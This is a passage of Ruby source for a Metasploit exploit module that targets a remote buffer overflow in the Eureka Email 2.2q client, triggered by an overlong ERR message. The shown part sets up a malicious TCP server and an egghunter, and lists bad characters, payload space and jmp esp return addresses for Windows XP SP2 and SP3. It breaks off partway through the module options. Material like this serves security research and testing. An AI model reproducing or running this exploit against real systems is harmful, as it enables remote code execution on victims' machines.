1 class Metasploit3 < Msf::Exploit::Remote
2 Rank = NormalRanking
3
4 include Msf::Exploit::Remote::TcpServer
5 include Msf::Exploit::Egghunter
6
7 def initialize(info = {})
8 super(update_info(info,
9 ’Name’ => ’Eureka Email 2.2q ERR Remote Buffer Overflow Exploit’,
10 ’Description’ => %q{
11 This module exploits a buffer overflow in the Eureka Email 2.2q
12 client that is triggered through an excessively long ERR message.
13 },
14 ’Author’ => [ ’Francis Provencher’, ’Dr_IDE’, ’dookie’, ],
15 ’License’ => MSF_LICENSE,
16 ’Version’ => ’$Revision: 7724 $’,
17 ’References’ =>
18 [
19 [ ’URL’, ’http://www.exploit−db.com/exploits/10235’ ],
20 ],
21 ’DefaultOptions’ =>
22 {
23 ’EXITFUNC’ => ’seh’,
24 },
25 ’Payload’ =>
26 {
27 ’Space’ => 2000,
28 ’BadChars’ => "\x00\x0a\x0d\x20",
29 ’StackAdjustment’ => −3500,
30 },
31 ’Platform’ => ’win’,
32 ’Targets’ =>
33 [
34 [ ’Win XP SP2 English’, { ’Ret’ => 0x77D8AF0A } ], # jmp esp user32.dll
35 [ ’Win XP SP3 English’, { ’Ret’ => 0x7E429353 } ], # jmp esp user32.dll
36 ],
37 ’Privileged’ => fal